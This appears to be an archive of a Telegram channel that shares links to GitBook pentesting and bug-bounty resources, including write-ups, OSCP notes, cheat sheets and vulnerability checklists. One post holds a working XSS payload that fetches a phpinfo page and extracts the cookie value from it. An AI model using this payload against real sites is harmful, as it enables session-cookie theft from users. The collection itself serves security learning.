Bug Bounty - GitBook

Post archive
𝗪𝗵𝗼𝗔𝗺𝗜 𝗪𝗿𝗶𝘁𝗲𝘂𝗽
•Web Cache Poisoning
•Came looking for SSRF and found XSS
•Phishing Attack using Machine Learning model
•JWT Attacks
•OAuth - Mechanism and Attacks
•Upgrade plan from Free to Paid via Response Manipulation
•XSS IN SOQL Console
•Journey from Automated Discovery to Manual Exploitation
Link 🔗:- https://ibraradi.gitbook.io/write-up/ @GitBook_s

𝗜𝗻𝗳𝗼𝘀𝗲𝗰 𝗕𝗹𝗼𝗴
•Web Application Findings
•Recon automation, tips and tricks
•Hack The Box Machines
•CTF Challenges
•Red Teaming Tips & Tricks
•Cloud Security
Link 🔗:- https://eslam3kl.gitbook.io/blog/ @GitBook_s

𝗕𝘂𝗴 𝗛𝘂𝗻𝘁𝗲𝗿 𝗛𝗮𝗻𝗱𝗯𝗼𝗼𝗸
•Getting Started in InfoSec and Bug Bounties
•Presentations
•Checklists / Guides
•Useful Twitter Threads
•List of Vulnerabilities
•API Security
•Mobile Security
•Fuzzing / Wordlists
•BugBounty Short Write-ups
•Burp Suite Tips and Tricks
•HackerOne Reports
•Response Manipulation
•Client Vs Server Side Vulnerabilities
•AWS
•Chaining of Bugs
•Bug Bounty Automation
•Mindmaps
•Oneliner Collections
•Red Teaming
•Blue Teaming
•Recon One Liners
•Containers
•Wordpress
•Fuzzing / FuFF
•OWASP ZAP
•Bug List
•Setting up burp collaborator
•Admin Panel PwN
•Credential Stuffing / Dump /
•HaveibeenPwned?
•Tools Required
•Nuclei Template
Link 🔗:- gowthams.gitbook.io/bughunter-handbook @GitBook_s

#SQLInjection @GitBook_s

#ResponseManipulation @GitBook_s

To support the channel, send the last post to groups.

x=new XMLHttpRequest(); x.open('GET','//host/phpinfo',0); x.send();rx=/COOKIE'.*v">(.*?)</; alert(x.responseText.match(rx)[1]); #XSS @GitBook_s

Guys, how are the gitbooks? Do you like them? If you have any comments about them, please write to me.

Guys, how are the gitbooks? Are they good, do you like them? If you have any thoughts on this, write to me. The reason I forwarded this is that some people never look at the start of the channel.

📖 Pentest Book by n3t_hunt3r XSS Filter Evasion and WAF Bypassing Tactics Cloud Pentesting Web App Pentesting Link 🔗:- https://n3t-hunt3r.gitbook.io/ @GitBook_s

Pentest Book Recon Enumeration Exploitation Post Exploitation Mobile Others Link 🔗:- http://six2dez.gitbook.io @GitBook_s

Breaking Bits Vulnerability Discovery CTF Firmware Emulator Exploit Development Link 🔗:- https://breaking-bits.gitbook.io/ @GitBook_s

Pentest Everything 🚩Writeups Everything Resources Link 🔗:- https://viperone.gitbook.io @GitBook_s

+ Application Security Cheat Sheet Android Application CI/CD Cloud Container Framework Linux iOS Application Resources Web Application Link 🔗:- https://0xn3va.gitbook.io/cheat-sheets @GitBook_s

bounty Account Takeover Methodology Application Level DoS Authentication Bypass Broken-Link Hijacking Broken Auth And Session Management CMS CORS CSRF Finding CVEs CheckList Web Page Source Code Review EXIF Geo Data Not Stripped File Upload Bypass Find Origin IP GraphQL HTTP Desync Attack Host-Header Attack HTML-Injection IDOR JWT ATTACK MFA Bypass Misconfigurations OAuth Open Redirection Parameter Pollution Password Reset Functionality Rate Limit Recon SQLi SSRF SSTI Sign Up Functionality Sensitive Info Leaks Status Code Bypass Subdomain Takeover Tabnabbing WAF Bypasses Weak Password Policy XSS XXE Link 🔗:- https://mjn.gitbook.io @GitBook_s

OSCP Notes Port Scanning Services Enumeration Web / HTTP password attacks Exploitation shell Linux Post Exploitation windows post exploitation file transfer cheatsheets Link 🔗:- https://gabb4r.gitbook.io/oscp-notes/ @GitBook_s

Cross-Site WebSocket Hijacking Exploitation in 2025 - Include Security Research Blog https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/